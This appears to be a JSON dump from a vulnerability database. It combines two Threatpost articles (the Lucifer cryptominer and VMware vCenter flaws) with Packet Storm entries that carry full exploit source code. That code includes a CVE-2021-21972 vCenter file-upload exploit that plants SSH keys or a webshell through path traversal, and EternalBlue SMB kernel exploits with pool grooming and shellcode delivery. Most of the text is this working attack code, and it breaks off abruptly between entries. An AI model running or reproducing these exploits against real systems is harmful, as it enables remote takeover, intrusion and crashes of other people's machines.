miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. 
If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42\u2019s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>), and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) exploits.\n\nOnce these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. 
They say enterprises can protect themselves with simple security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n", "cvss3": {}, "published": "2020-06-24T21:20:16", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "modified": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-25T02:52:39", "description": "VMware has patched three vulnerabilities in its virtual-machine infrastructure for data centers, the most serious of which is a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system to find other vulnerable points of network entry to take over affected systems.\n\nPositive Technologies researcher Mikhail Klyuchnikov discovered two of the flaws in vCenter Server, the centralized management and automation platform for VMware\u2019s vSphere virtualization platform, which\u2014given VMware\u2019s dominant position in the market\u2014is used by the majority of enterprise data centers. Among its duties, vCenter Server manages virtual machines, multiple ESXi hypervisor hosts and other various dependent components from a central management dashboard.\n\n## **Where the VMware Flaws Were Found, What\u2019s Affected? 
**\n\nThe researcher found the most critical of the flaws, which is being tracked as [CVE-2021-21972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972>) and has a CVSS v3 score of 9.8, in a vCenter Server plugin for vROPs in the vSphere Client functionality, according to [an advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) posted online Tuesday by VMware.\n\n\u201cA malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\u201d the company said.\n\nThe plugin is available in all default installations\u2014potentially giving attackers a wide attack surface\u2013and vROPs need not be present to have this endpoint available, according to VMware.\n\nThe main threat in terms of exploiting the vulnerability comes from insiders who have penetrated the protection of the network perimeter using other methods\u2013such as social engineering or web vulnerabilities\u2013or have access to the internal network using previously installed backdoors, according to Positive Technologies.\n\nKlyuchnikov said the VMware flaw poses \u201cno less threat\u201d than a notoriously easy-to-exploit[ Citrix RCE vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>), [CVE-2019-19781](<https://www.google.ru/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiOm6_Z4rnuAhWwlosKHTPHARo4ChAWMAJ6BAgLEAI&url=https://www.forbes.com/sites/daveywinder/2020/01/25/critical-security-warning-as-shitrix-hackers-ramp-up-critical-citrix-vulnerability-cve201919781-attacks/&usg=AOvVaw2MEaqcCGRpYlOcxC-Bey_j>), which was discovered two years ago affecting more than 25,000 servers globally. 
It is especially dangerous because \u201cit can be used by any unauthorized user,\u201d he said.\n\n\u201cThe error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server,\u201d Klyuchnikov explained. \u201cAfter receiving such an opportunity, the attacker can develop this attack, successfully move through the corporate network, and gain access to the data stored in the attacked system, such as information about virtual machines and system users.\u201d\n\n## How is CVE-2021-21972 Exploited?\n\nIn the case in which vulnerable software can be accessed from the internet, an external attacker can break into a company\u2019s external perimeter and also gain access to sensitive data, he added. This scenario is highly likely based on previous pentests executed by Positive Technologies, which allowed researchers to breach the network perimeter and gain access to local network resources in 93 percent of companies, according to the company.\n\nAnother flaw patched by VMware in the update also has potential for remote code execution and affects the hypervisor [VMware ESXi](<https://threatpost.com/vmware-critical-flaw-esxi-hypervisor/161457/>), the company said. [CVE-2021-21974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974>), with a CVSSv3 base score of 8.9, is a heap-overflow vulnerability in the OpenSLP component as used in an ESXi host.\n\nA threat actor who\u2019s already inside the same network segment as an ESXi host and has access to port 427 can use the vulnerability to trigger the heap-overflow issue in the OpenSLP service, resulting in remote code execution, according to VMware.\n\nThe other flaw Klyuchnikov discovered\u2014tracked as [CVE-2021-21973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21973>) and the least serious of the three\u2013is a Server Side Request Forgery (SSRF) vulnerability due to improper validation of URLs in a vCenter Server plugin with a CVSS score of 5.3, according to VMware. \u201cA malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure,\u201d the company said.\n\nUnauthorized users can use the flaw to send requests as the targeted server to help threat actors develop further attacks. Used in combination with the other vulnerabilities, attackers could leverage it to scan the company\u2019s internal network and obtain information about the open ports of various services, Klyuchnikov said.\n\n## What Is VMware Recommending as a Fix for the Data Center Bugs?\n\nVMware advised customers to install all updates provided to affected deployments to remediate the threat the vulnerabilities pose. 
The company also provided workarounds for those who can\u2019t immediately update their systems.\n\nPositive Technologies also recommended that companies affected who have vCenter Server interfaces on the perimeter of their organizations remove them, and also allocate the interfaces to a separate VLAN with a limited access list in the internal network, the company said.\n", "cvss3": {}, "published": "2021-02-24T17:14:55", "type": "threatpost", "title": "VMWare Patches Critical RCE Flaw in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-24T17:14:55", "id": "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "href": "https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-03-01T16:09:17", "description": "", "cvss3": {}, "published": "2021-03-01T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 7.0 Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "PACKETSTORM:161590", "href": "https://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html", "sourceData": "`# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload \n# Date: 2021-02-27 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html \n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) \n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds \n# CVE: CVE-2021-21972 \n \n#!/usr/bin/env python3 \n''' \nCopyright 2021 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. 
\n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-21972.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nCVE-2021-21972 is an unauthenticated file upload and overwrite, \nexploitation can be done via SSH public key upload or a webshell \nThe webshell must be of type JSP, and its success depends heavily on the specific vCenter version \n \n# Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister \n# A white page means vulnerable \n# A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) \n# Notes: \n# * On Linux SSH key upload is always best, when SSH access is possible & enabled \n# * On Linux the upload is done as user vsphere-ui:users \n# * On Windows the upload is done as system user \n# * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\" \n# * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload \n \nThis is a native implementation without requirements, written in Python 3. 
\nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: vulnerability checker + exploit \n''' \n \nimport os, tarfile, sys, optparse, requests \nrequests.packages.urllib3.disable_warnings() \n \nlProxy = {} \nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> \n<env:Body> \n<RetrieveServiceContent xmlns=\"urn:vim25\"> \n<_this type=\"ServiceInstance\">ServiceInstance</_this> \n</RetrieveServiceContent> \n</env:Body> \n</env:Envelope>''' \nsURL = sFile = sRpath = sType = None \n \ndef parseArguments(options): \nglobal sURL, sFile, sType, sRpath, lProxy \nif not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') \nsURL = options.url \nif sURL[-1:] == '/': sURL = sURL[:-1] \nif not sURL[:4].lower() == 'http': sURL = 'https://' + sURL \nsFile = options.file \nif not os.path.exists(sFile): exit('[-] File not found: ' + sFile) \nsType = 'ssh' \nif options.type: sType = options.type \nif options.rpath: sRpath = options.rpath \nelse: sRpath = None \nif options.proxy: lProxy = {'https': options.proxy} \n \ndef getVersion(sURL): \ndef getValue(sResponse, sTag = 'vendor'): \ntry: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] \nexcept: pass \nreturn '' \noResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) \n#print(oResponse.text) \nif oResponse.status_code == 200: \nsResult = oResponse.text \nif not 'VMware' in getValue(sResult, 'vendor'): \nexit('[-] Not a VMware system: ' + sURL) \nelse: \nsName = getValue(sResult, 'name') \nsVersion = getValue(sResult, 'version') # e.g. 7.0.0 \nsBuild = getValue(sResult, 'build') # e.g. 
15934073 \nsFull = getValue(sResult, 'fullName') \nprint('[+] Identified: ' + sFull) \nreturn sVersion, sBuild \nexit('[-] Not a VMware system: ' + sURL) \n \ndef verify(sURL): \n#return True \nsURL += '/ui/vropspluginui/rest/services/uploadova' \ntry: \noResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) \nexcept: \nexit('[-] System not available: ' + sURL) \nif oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely \nelse: return False \n \ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): \ndef getResourcePath(): \noResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) \nreturn oResponse.text.split('static/')[1].split('/')[0] \noTar = tarfile.open('payloadLin.tar','w') \nif sRpath: ## version & build not important \nif sRpath[0] == '/': sRpath = sRpath[1:] \nsPayloadPath = '../../' + sRpath \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'absolute' \nelif sType.lower() == 'ssh': ## version & build not important \nsPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'ssh' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): \n## vCenter 6.5/6.7 < 13010631, just this location with a subnumber \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) \nprint('[!] 
https://msdn.microsoft.com/en-us/library/cc246496.aspx \n# Above link is about SMB2, but the important here is first 4 bytes. \n# If using wireshark, you will see the StreamProtocolLength is NBSS length. \n# The first 4 bytes is same for all SMB version. It is used for determine the SMB message length. \n# \n# After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message. \n# srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message. \n# Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too. \nsk = socket.create_connection((target, 445)) \n# For this exploit, use size is 0x11000 \npkt = '\\x00' + '\\x00' + pack('>H', 0xfff7) \n# There is no need to be SMB2 because we got code execution by corrupted srvnet buffer. \n# Also this is invalid SMB2 message. \n# I believe NSA exploit use SMB2 for hiding alert from IDS \n#pkt += '\\xffSMB' # smb2 \n# it can be anything even it is invalid \npkt += 'BAAD' # can be any \npkt += '\\x00'*0x7c \nsk.send(pkt) \nreturn sk \n \n \ndef exploit(target, shellcode, numGroomConn): \n# force using smb.SMB for SMB1 \nconn = smb.SMB(target, target) \n \n# can use conn.login() for ntlmv2 \nconn.login_standard('', '') \nserver_os = conn.get_server_os() \nprint('Target OS: '+server_os) \nif not (server_os.startswith(\"Windows 7 \") or server_os.startswith(\"Windows Server 2008 \")): \nprint('This exploit does not support this target') \nsys.exit() \n \n \ntid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$') \n \n# Here is code path in WinNT4 (all reference files are relative path to https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/) \n# - SrvSmbNtTransaction() (smbtrans.c#L2677) \n# - When all data is received, call ExecuteTransaction() at (smbtrans.c#L3113) \n# - ExecuteTransaction() (smbtrans.c#L82) \n# - Call dispatch table (smbtrans.c#L347) \n# - Dispatch table is defined at srvdata.c#L972 (target 
is command 0, SrvSmbOpen2() function) \n# - SrvSmbOpen2() (smbopen.c#L1002) \n# - call SrvOs2FeaListToNt() (smbopen.c#L1095) \n \n# https://msdn.microsoft.com/en-us/library/ee441720.aspx \n# Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command \n# Note: cannot use SMB_COM_TRANSACTION2 for the exploit because the TotalDataCount field is USHORT \n# Note: transaction max data count is 66512 (0x103d0) and DataDisplacement is USHORT \nprogress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, 2000, False) \n# we have to know what size of NtFeaList will be created when last fragment is sent \n \n# make sure server recv all payload before starting allocate big NonPaged \n#sendEcho(conn, tid, 'a'*12) \n \n# create buffer size NTFEA_SIZE-0x1000 at server \n# this buffer MUST NOT be big enough for overflown buffer \nallocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010) \n \n# groom nonpaged pool \n# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one \nsrvnetConn = [] \nfor i in range(numGroomConn): \nsk = createConnectionWithBigSMBFirst80(target) \nsrvnetConn.append(sk) \n \n# create buffer size NTFEA_SIZE at server \n# this buffer will be replaced by overflown buffer \nholeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10) \n# disconnect allocConn to free buffer \n# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer \nallocConn.get_socket().close() \n \n# hope one of srvnetConn is next to holeConn \nfor i in range(5): \nsk = createConnectionWithBigSMBFirst80(target) \nsrvnetConn.append(sk) \n \n# send echo again, all new 5 srvnet buffers should be created \n#sendEcho(conn, tid, 'a'*12) \n \n# remove holeConn to create hole for fea buffer \nholeConn.get_socket().close() \n \n# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header 
\nsend_trans2_second(conn, tid, feaList[progress:], progress) \nrecvPkt = conn.recvSMB() \nretStatus = recvPkt.getNTStatus() \n# retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag \nif retStatus == 0xc000000d: \nprint('good response status: INVALID_PARAMETER') \nelse: \nprint('bad response status: 0x{:08x}'.format(retStatus)) \n \n \n# one of srvnetConn struct header should be modified \n# a corrupted buffer will write recv data in designed memory address \nfor sk in srvnetConn: \nsk.send(fake_recv_struct + shellcode) \n \n# execute shellcode by closing srvnet connection \nfor sk in srvnetConn: \nsk.close() \n \n# nicely close connection (no need for exploit) \nconn.disconnect_tree(tid) \nconn.logoff() \nconn.get_socket().close() \n \n \nif len(sys.argv) < 3: \nprint(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0])) \nsys.exit(1) \n \nTARGET=sys.argv[1] \nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3]) \n \nfp = open(sys.argv[2], 'rb') \nsc = fp.read() \nfp.close() \n \nprint('shellcode size: {:d}'.format(len(sc))) \nprint('numGroomConn: {:d}'.format(numGroomConn)) \n \nexploit(TARGET, sc, numGroomConn) \nprint('done') \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142603/mswin72008eb-exec.txt"}, {"lastseen": "2017-05-20T17:27:32", "description": "", "cvss3": {}, "published": "2017-05-20T00:00:00", "type": "packetstorm", "title": "Microsoft Windows 8/2012 R2 x64 EternalBlue Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-05-20T00:00:00", "id": "PACKETSTORM:142602", "href": "https://packetstormsecurity.com/files/142602/Microsoft-Windows-8-2012-R2-x64-EternalBlue-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \nfrom impacket import smb \nfrom struct import pack \nimport os \nimport sys \nimport socket \n \n''' 
\nEternalBlue exploit for Windows 8 and 2012 by sleepya \nThe exploit might FAIL and CRASH a target system (depended on what is overwritten) \nThe exploit support only x64 target \nTested on: \n- Windows 2012 R2 x64 \n- Windows 8.1 x64 \nDefault Windows 8 and later installation without additional service info: \n- anonymous is not allowed to access any share (including IPC$) \n- tcp port 445 if filtered by firewall \nReference: \n- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \n- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit \nExploit info: \n- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at \nhttps://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \n- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). \nOn Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \n- The exploit is likely to crash a target when it failed \n- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \n- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5) \n- See the code and comment for exploit detail. 
\nDisable NX method: \n- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \n- The exploit is also the same but we need to trigger bug twice \n- First trigger, set MDL.MappedSystemVa to target pte address \n- Write '\\x00' to disable the NX flag \n- Second trigger, do the same as Windows 7 exploit \n- From my test, if exploit disable NX successfully, I always get code execution \n''' \n \n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000 \nNTFEA_SIZE = 0x9000 \n \nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80 \nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c \nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR \n \n''' \nReverse from srvnet.sys (Win2012 R2 x64) \n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete(): \n// size 0x90 \nstruct SRVNET_BUFFER_HDR { \nLIST_ENTRY list; \nUSHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. if 0x2 is set, go to lookaside. 
\nchar unknown0[6]; \nchar *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\") \nDWORD netRawBufferSize; // offset: 0x20 \nDWORD ioStatusInfo; \nDWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100 \nDWORD pad2; \nchar *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER \nPMDL pmdl1; // point at offset 0x90 from this struct \nDWORD nByteProcessed; // 0x40 \nchar unknown4[4]; \nQWORD smbMsgSize; // MUST be modified to size of all recv data \nPMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address \nQWORD pSrvNetWskStruct; // want to change to fake struct address \nDWORD unknown6; // 0x60 \nchar unknown7[12]; \nchar unknown8[0x20]; \n}; \nstruct SRVNET_BUFFER { \nchar transportHeader[80]; // 0x50 \nchar buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000) \nSRVNET_BUFFER_HDR hdr; //some header size 0x90 \n//MDL mdl1; // target \n}; \nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer. \nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and \nDataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST. \nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes. \nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow. \n''' \n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing \n# Here is the important fields on x64 \n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. This value MUST be valid address because there is \n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\". 
\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes). \n# This value MUST be exactly same as the number of bytes we send. \n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode) \n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request. \n# The value MUST point to valid (might be fake) struct. \n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer \n# - 0x90 (VOID*) : MDL.Next should be NULL \n# - 0x98 (USHORT) : MDL.Size should be some value that not too small \n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL) \n# - 0x90 (VOID*) : MDL.Process should be NULL \n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write. \n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit). \n# \n# \n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition. \n# Here is related field for freeing corrupted buffer \n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0 \n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag() \n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0 \n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to \n# your shellcode as function argument \n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set \n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\". 
\n# Here is x64 assembly code for setting nByteProcessed field \n# - fetch SRVNET_BUFFER address from function argument \n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40] \n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below) \n# \\x48\\x01\\xd1 add rcx, rdx \n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx \n# - set nByteProcessed for trigger free after return \n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48] \n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx \n \nTARGET_HAL_HEAP_ADDR = 0xffffffffffd00e00 # for put fake struct and shellcode \n \n# Note: feaList will be created after knowing shellcode size. \n \n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa \n# PTE of 0xffffffffffd01000 is at 0xfffff6ffffffe808 \n# NX bit is at 0xfffff6ffffffe80f \n# MappedSystemVa = 0xfffff6ffffffe80f - 0x7f = 0xfffff6ffffffe790 \nfakeSrvNetBufferX64Nx = '\\x00'*16 \nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) \nfakeSrvNetBufferX64Nx += '\\x00'*16 \nfakeSrvNetBufferX64Nx += '\\x00'*16 \nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0) \nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct \nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0) \nfakeSrvNetBufferX64Nx += '\\x00'*16 \nfakeSrvNetBufferX64Nx += '\\x00'*16 \nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags \nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0xfffff6ffffffe80f-0x7f) # MDL.Process, MDL.MappedSystemVa \n \nfeaListNx = pack('<I', 0x10000) \nfeaListNx += ntfea9000 \nfeaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name \n# stop copying by invalid flag (can be any value except 0 and 0x80) \nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678) \n \n \ndef createFakeSrvNetBuffer(sc_size): \n# 0x200 is size of fakeSrvNetBufferX64 \ntotalRecvSize = 0x80 + 0x200 + sc_size \nfakeSrvNetBufferX64 = '\\x00'*16 
\nfakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40 \nfakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct \nfakeSrvNetBufferX64 += pack('<QQ', 0, 0) \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += '\\x00'*16 \nfakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags \nfakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa \nreturn fakeSrvNetBufferX64 \n \ndef createFeaList(sc_size): \nfeaList = pack('<I', 0x10000) \nfeaList += ntfea9000 \nfakeSrvNetBuf = createFakeSrvNetBuffer(sc_size) \nfeaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name \n# stop copying by invalid flag (can be any value except 0 and 0x80) \nfeaList += pack('<BBH', 0x12, 0x34, 0x5678) \nreturn feaList \n \n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler() \n# x64: fake struct is at ffffffff ffd00e00 \n# offset 0x50: KSPIN_LOCK \n# offset 0x58: LIST_ENTRY must be valid address. cannot be NULL. 
